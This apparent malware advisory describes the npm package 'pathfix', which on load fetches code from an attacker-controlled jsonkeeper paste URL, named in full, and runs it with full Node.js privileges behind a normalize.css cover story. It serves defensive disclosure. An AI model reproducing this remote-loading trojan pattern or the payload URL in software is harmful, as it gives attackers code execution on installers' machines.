MAL-2026-5989

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (44585f45909a087f0880fc714e7fdc0977285884ea381e29c7b450ae7d5c2683) On `require('pathfix')`, index.js auto-invokes initPlugin(), which performs an HTTP GET to https://jsonkeeper.com/b/T1SVX, parses the response as JSON, and passes the `cookie` field to `new Function.constructor('require',...)` and immediately invokes the resulting function with the package's own `require`. This grants the attacker-mutable jsonkeeper paste full Node.js privileges (filesystem, child_process, network) on the installer's machine the moment the package is loaded. The package metadata describes itself as 'Stylus porting of normalize.css' and declares unrelated dependencies (express, sqlite3, axios, request); only `request` is actually used, and only to fetch the remote payload — a cover-story / trojan pattern. Anyone who installs and requires this package executes whatever code the attacker has placed at that paste URL at that moment.